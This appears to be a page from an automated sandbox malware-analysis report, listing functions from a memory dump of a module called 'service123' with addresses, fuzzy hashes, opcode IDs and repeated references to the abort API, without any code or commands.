Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a538939d610125f0e8fd8c64bba2244edb74dbb93198722778f8a06010466cbb
Instruction ID: 2c3c891243f3fa8e83ea70471b6eefcbd515cc75e026db448b852a8283bda001
Opcode Fuzzy Hash: a538939d610125f0e8fd8c64bba2244edb74dbb93198722778f8a06010466cbb
Instruction Fuzzy Hash: 05014032A081D4CF8780EE7DC88449AB7F5BB4F218F04EA5AE84C87706E635D8048F66

Function 6C3684A0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d78c849c72b2bab32e6fee0c1ad93d414dc49f8b7742843564e45852c9edf51
Instruction ID: 2df2a4f0aa991592520476cf1bf6d0adc5fd2fdcea49323d857a5d1e74b34872
Opcode Fuzzy Hash: 6d78c849c72b2bab32e6fee0c1ad93d414dc49f8b7742843564e45852c9edf51
Instruction Fuzzy Hash: 8E012C71A082808FC391DF39C48156BBBF46B5F204F45D95AE888C7316E236C815CB67

Function 6C2ED504 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38065637cddd05bc63f8f55e83b5f6858d4a716cd9787bd456eb58d9b090392b
Instruction ID: 4a54d2c7a8425a84b4d0d8921719572c3bb985349eace08dd2acf50668bf08b6
Opcode Fuzzy Hash: 38065637cddd05bc63f8f55e83b5f6858d4a716cd9787bd456eb58d9b090392b
Instruction Fuzzy Hash: 1C015EB1A052059BD704EF29C48076AFBE4EF89348F50856DE888DB701D331D845CBD2

Function 6C394360 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb55cc2fcb309bcbe95e7c9940cea09e7d501e2b93da970b9dfd70acda7a43d9
Instruction ID: a6f48327ded890ee3a0dffeab8b6a8e92508e1ef67d20f001c9a7742f2b1a6e4
Opcode Fuzzy Hash: bb55cc2fcb309bcbe95e7c9940cea09e7d501e2b93da970b9dfd70acda7a43d9
Instruction Fuzzy Hash: 24F01D36B041409F8790FF3CC54296AB7F8A74B218F889959E858C3706F235D4148F67

Function 6C31A1E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61d8174a185b364a4e67489e6921e27920b7e472cbf418ec63217d927391cece
Instruction ID: 92a44e344ed9e806fc4b5de32065f75960d7b660eb7f9fa7f0701ffa339afa14
Opcode Fuzzy Hash: 61d8174a185b364a4e67489e6921e27920b7e472cbf418ec63217d927391cece
Instruction Fuzzy Hash: C8D01271E040409F8B80EE28C541856B7B0AB4A204F54D945E80857706D233D8068F56

Function 6C2ED974 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction ID: e5c9c55b4654698ca947307211ebe0b1459354a8dbf0ad86dd4d3b221bbea9f1
Opcode Fuzzy Hash: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction Fuzzy Hash: 09C012B19441044BCF40EF34C0C0078F6F1AF86248F525458C4C4E7600E771C845CB86

Function 6C2ED674 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction ID: 7e57d5927507e95f81d31ea6c844dc199c81cf5b13715f9d95f1d1630783cc28
Opcode Fuzzy Hash: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction Fuzzy Hash: F3C012B19441044BCF80EF34C0C0078F3F1AB86248F525858C484E7700E730D846CB46

Function 6C2ED7F4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction ID: 90fd07b4c19a53d1e35ede4d89e53281479d3b843a71ee27689ccd982179e63d
Opcode Fuzzy Hash: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction Fuzzy Hash: 1DC012B1D441084BDF40EF38C0C0578F3F0AB86248F522558C484E7600E730CC46CB46

Function 6C2DB1D0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction ID: 2551a5d668069c6e41398eda162a32b3cb4c29bc208536e3a6088f650a53bc13
Opcode Fuzzy Hash: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction Fuzzy Hash: FFC012F0C062408BC600BF38810A228BAB07B42208F8428ACD58413301E739C01C9A5B

Function 6C2CBAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Strings

@, xrefs: 6C2CBAB1

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: 849f1d952a69747dff91aa5125f7430ded45dd37bd36de1b59e90637544a1c55
Instruction ID: 7be5ca534c5217cf03fd300c44c14d4850a51892658283f08b6a65404c885c8c
Opcode Fuzzy Hash: 849f1d952a69747dff91aa5125f7430ded45dd37bd36de1b59e90637544a1c55
Instruction Fuzzy Hash: F1B1363270931E8FC790CE2CC490755B7E6AB89318F45466EECA497B95D735E908CBC2

Function 6C2C2290 Relevance: 42.4, APIs: 28, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d46e152a522741b955f8799bc0728f30da5e888a86ecb87e05ee0690b775191
Instruction ID: ea3de423e66e53df9ef77b57752fcc61c365d75f6d77051f4e2bf90740acf205
Opcode Fuzzy Hash: 2d46e152a522741b955f8799bc0728f30da5e888a86ecb87e05ee0690b775191
Instruction Fuzzy Hash: C7C1CFB17002058FD7848F29C48475AB7E1AF45308F15AB69EC98DFB05DB39E94ACF92

Function 6C2CB7A0 Relevance: 42.2, APIs: 28, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48b0134829f76388a87186bdd1d84a7f077029feb5566022acac3de148708796
Instruction ID: 9bd6aea12b90397346199c0ddb94a54a7b92b744203067b36aaa52e0860e3f3a
Opcode Fuzzy Hash: 48b0134829f76388a87186bdd1d84a7f077029feb5566022acac3de148708796
Instruction Fuzzy Hash: 8841E57660938A9FD750DF29C0C07167BE0AF86329F18869DED954BB82C335E855CB82

Function 6C2C28FA Relevance: 42.1, APIs: 28, Instructions: 84COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C396CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 5f724982a130ed0669c9c199974dc11116d2a0db197ff65a6ad6226081273589
Instruction ID: afeb63ebe4b811e3f2367afa1d29cebda5fc7a2d8b18cb8c815b8625eaa0f61f
Opcode Fuzzy Hash: 5f724982a130ed0669c9c199974dc11116d2a0db197ff65a6ad6226081273589
Instruction Fuzzy Hash: 211192B2642205CBE748FF18E892F5577B0FB21309F019B58E594D7A11D739E818CF91

Function 6C2C2A2F Relevance: 42.1, APIs: 28, Instructions: 82COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C396CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1c1bbcec5a69c9b2cd6cfee4ef383e7e2800126eb500fc2108618abef5b4b708
Instruction ID: be71edb8d7240b70428acfc0879955e7d36a4e6a1ddbe49ec6b6c023800f2216
Opcode Fuzzy Hash: 1c1bbcec5a69c9b2cd6cfee4ef383e7e2800126eb500fc2108618abef5b4b708
Instruction Fuzzy Hash: BC11A5B2642205CBE748FF18D892F5577B0FB21309F019B54D594D7A15D739E818CF91

Function 6C2C29F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C396CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
